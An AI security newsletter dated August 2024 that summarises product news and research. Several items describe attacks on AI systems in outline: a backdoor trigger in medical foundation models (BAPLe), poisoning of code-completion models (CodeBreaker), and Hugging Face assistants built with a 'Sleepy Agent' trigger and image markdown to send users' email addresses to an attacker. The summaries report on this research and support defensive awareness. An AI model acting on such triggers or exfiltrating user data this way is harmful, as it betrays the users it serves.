AI Security Newsletter (Aug. 26, 2024)
Technology & Tools
GitHub’s AI Revolution in Code Security
GitHub introduces Copilot Autofix, an AI-driven tool within its Advanced Security suite, designed to swiftly identify and propose fixes for code vulnerabilities. By analyzing flaws and suggesting corrections, Copilot Autofix enables developers, especially those in GitHub Enterprise Cloud, to address security issues more efficiently. Starting September, it will also support open source projects for free, marking a significant step towards faster and smarter software development.
NVIDIA Unveils Compact Mistral-NeMo-Minitron 8B Model
NVIDIA has launched Mistral-NeMo-Minitron 8B, a compact yet highly accurate language model designed for GPU-accelerated environments. This model, a smaller version of the Mistral NeMo 12B, offers state-of-the-art accuracy while being efficient enough to run on workstations. It excels in various AI applications, from chatbots to educational tools, thanks to innovative AI optimization techniques like pruning and distillation. Additionally, NVIDIA introduced Nemotron-Mini-4B-Instruct for even lower memory usage, both models enhancing NVIDIA’s suite of AI-driven digital human technologies.
https://blogs.nvidia.com/blog/mistral-nemo-minitron-8b-small-language-model
Microsoft Unveils Enhanced Phi-3.5 SLMs with Multi-Lingual and Image Understanding Capabilities
Microsoft’s latest update to its Small Language Models (SLMs), the Phi-3.5 series, introduces significant enhancements in multi-lingual support and image understanding. The Phi-3.5-mini model now supports a wider range of languages with improved performance, while the new Phi-3.5-MoE model combines 16 experts for high-quality, efficient multi-lingual support and reduced latency. Additionally, the Phi-3.5-vision model advances multi-frame image understanding, setting new benchmarks in image analysis. These updates offer Azure customers and the open-source community more versatile and powerful tools for building generative AI applications, maintaining Microsoft’s commitment to cost-effective, high-performance AI solutions.
LinkedIn Boosts Security with AI-Driven Platform
LinkedIn has significantly upgraded its security posture management by introducing the Security Posture Platform (SPP), leveraging AI to automate data analysis and enhance vulnerability response times by approximately 150%. The platform, enriched with a Security Knowledge Graph, offers a dynamic, comprehensive view of the digital infrastructure, enabling proactive risk management and mitigation. By integrating AI, SPP streamlines operations, reduces manual intervention, and improves coverage and responsiveness to emerging threats, marking a pivotal advancement in LinkedIn’s security strategy.
AI Security Incidents and Risks
Novel Backdoor Attack Method Exposed in Medical Foundation Models
Researchers at Mohamed bin Zayed University of AI have unveiled BAPLe, a novel backdoor attack method targeting medical foundation models (Med-FMs) during the prompt learning phase. This technique, requiring minimal data, embeds an imperceptible noise trigger alongside learnable text prompts into Med-FMs, demonstrating a high success rate across various models and datasets. The study highlights the vulnerability of Med-FMs to backdoor attacks, urging the development of secure models before real-world application.
https://asif-hanif.github.io/baple/
AI’s Role in Election Influence Thwarted
OpenAI recently dismantled an Iranian operation, Storm-2035, which exploited ChatGPT to craft content aimed at swaying the US presidential election. Despite generating a range of materials from long articles to social media comments on hot-button issues like the US election and the Israel-Gaza conflict, the campaign failed to gain significant traction online. OpenAI has since banned the accounts involved and remains vigilant against policy violations, underscoring the ongoing battle against misuse of AI in political manipulation.
https://www.theguardian.com/technology/article/2024/aug/16/open-ai-chatgpt-iran
Hugging Face AI Vulnerabilities Exposed
Researchers have unveiled vulnerabilities in Hugging Face’s AI chat assistants, demonstrating how they can be manipulated to stealthily extract user email addresses. By employing techniques like Sleepy Agent and Image Markdown Rendering, attackers can create seemingly benign assistants that, upon receiving specific triggers such as an email input, secretly send this information to an attacker’s server. Despite Hugging Face being alerted to these security risks, the platform’s open-source nature and reliance on user vigilance in reading system prompts before use leave it susceptible to such attacks. This revelation underscores the importance of users being cautious and informed about the AI tools they interact with online.
https://www.lasso.security/blog/exploiting-huggingfaces-assistants-to-extract-users-data
DeepMind’s AGI Safety Team Expands Efforts in AI Risk Mitigation
Google DeepMind’s AGI Safety & Alignment team, under the leadership of notable figures like Anca Dragan and Shane Legg, is intensifying its efforts to mitigate existential risks posed by AI. With a 39% growth last year and continued expansion, the team focuses on amplified oversight, frontier safety analysis, and mechanistic interpretability of AI models. Their work, including the development of the Frontier Safety Framework and innovations in AI understanding, sets new standards in AI safety and existential risk mitigation.
Researchers Uncover CodeBreaker Technique to Poison AI Code Suggestions
A team from three universities has developed CodeBreaker, a method that can poison AI-driven code completion tools, making them suggest vulnerable code undetectable by static analysis tools. This advancement in poisoning large language models (LLMs) requires developers to scrutinize AI-generated code more than ever, emphasizing the need for a critical approach towards code suggestions for security. The research, presented at the USENIX Security Symposium, highlights the evolving challenge of ensuring AI-generated code’s security amidst the potential for malicious data poisoning.
Business and Products
McAfee Introduces AI-powered Deepfake Detector on Lenovo AI PCs
McAfee has launched the world’s first automatic AI-powered Deepfake Detector, now available exclusively on select Lenovo AI PCs. This cutting-edge technology, boasting a 96% accuracy rate, alerts users within seconds if AI-generated audio is detected in videos, enhancing consumer ability to discern real from fake content. Developed with privacy in mind, the Deepfake Detector operates directly on devices, leveraging the Neural Processing Unit (NPU) for improved performance and privacy. This collaboration between McAfee and Lenovo aims to empower users to navigate the digital world safely, amidst the rising concern over AI-generated scams and misinformation.
https://news.lenovo.com/pressroom/press-releases/mcafee-first-automatic-ai-powered-deepfake-detector
AMD Advances AI PC Era with Ryzen AI 300 Chips and Developer Engagement
AMD is intensifying its push into the AI PC market with its Ryzen AI 300 chips, aiming to transform computing with neural processing units (NPUs) designed for AI tasks. In an Engadget Podcast interview, AMD executives outlined a strategy to attract developers to create AI-powered applications, emphasizing a robust software stack, high-performance hardware, and open-source solutions like ONNX. The company also highlighted its collaboration with Microsoft and OEMs
Opinions & Analysis
Gartner’s 2024 Hype Cycle Spotlights Key Tech Trends
Gartner’s 2024 Hype Cycle for Emerging Technologies identifies 25 disruptive technologies across four main areas: autonomous AI, developer productivity, total experience, and human-centric security and privacy. Highlighting the shift from foundational AI models to ROI-driven use cases, the report underscores the importance of autonomous AI systems capable of minimal human oversight. It also emphasizes enhancing developer productivity through advanced tools, creating superior shared experiences via total experience strategies, and integrating human-centric approaches to security and privacy. These technologies are poised to offer transformational benefits within the next decade.

Leave a comment